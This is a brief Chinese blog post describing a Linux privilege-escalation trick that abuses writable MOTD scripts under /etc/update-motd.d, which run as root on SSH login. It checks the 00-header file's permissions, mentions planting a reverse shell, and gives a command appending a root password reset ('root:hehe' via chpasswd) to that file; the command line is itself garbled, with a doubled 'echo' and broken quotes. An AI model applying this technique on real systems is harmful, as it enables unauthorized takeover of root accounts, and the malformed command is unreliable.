linux motd提权

而motd是负责ssh登录后,页面欢迎语 提示语的,用户可以通过配置文件自定义欢迎提示信息。具体配置文件在/etc/update-motd.d/* ,理论上这个目录下的任意文件都可以。通常修改99-header文件即可。

一、检查/etc/update-motd.d/00-header文件权限是否可写

ls -al /etc/update-motd.d/00-header

二、写入提权脚本,这里有两种思路,一种是直接反弹shell,利用python等脚本。另一种是把修改root密码的脚本写入该文件即可

  *这里不能用bash -i重定向方式写入反弹shell,重定向符会造成fd number错误

echoecho ‘root:hehe’ | sudo chpasswd” >> /etc/update-motd.d/00-header

 

posted @ 2022-02-16 11:05  隐念笎  阅读(491)  评论(0编辑  收藏  举报